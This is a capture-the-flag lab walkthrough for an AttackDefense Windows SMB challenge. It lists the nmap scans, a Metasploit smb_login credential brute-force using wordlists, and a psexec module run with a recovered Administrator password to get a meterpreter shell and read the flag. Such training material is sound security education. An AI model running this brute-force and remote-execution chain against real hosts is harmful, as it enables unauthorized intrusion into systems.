Name Windows: SMB Server PSexec

URL https://attackdefense.com/challengedetails?cid=1959

Type Windows Exploitation: Services

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: ​Checking target IP address.

Note: ​The target IP address is stored in the “target” file.

Command: ​cat /root/Desktop/target

Step 2:​ Run an Nmap scan against the target IP.

Command: ​nmap 10.0.0.242

Step 3: ​We have discovered that multiple ports are open. The SMB port 445 is also exposed.
We will run nmap script to list the supported protocols and dialects of a SMB server.

Command:​ nmap -p445 --script smb-protocols 10.0.0.242

Step 4: ​We will run smb_login module to find all the valid users and their passwords.

Commands:
use auxiliary/scanner/smb/smb_login
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set RHOSTS 10.0.0.242
set VERBOSE false
exploit

We have found four valid users and their passwords.

Step 5: ​Running psexec module to gain the meterpreter shell.

Commands:
use exploit/windows/smb/psexec
set RHOSTS 10.0.0.242
set SMBUser Administrator
set SMBPass qwertyuiop
exploit
We have received a meterpreter shell.

Step 6: ​Searching the flag.

Commands:
shell
cd /
dir
type flag.txt
This reveals the flag to us.

Flag: ​e0da81a9cd42b261bc9b90d15f780433

References

1. Metasploit Modules
https://www.rapid7.com/db/modules/auxiliary/scanner/smb/smb_login
https://www.rapid7.com/db/modules/exploit/windows/smb/psexec​)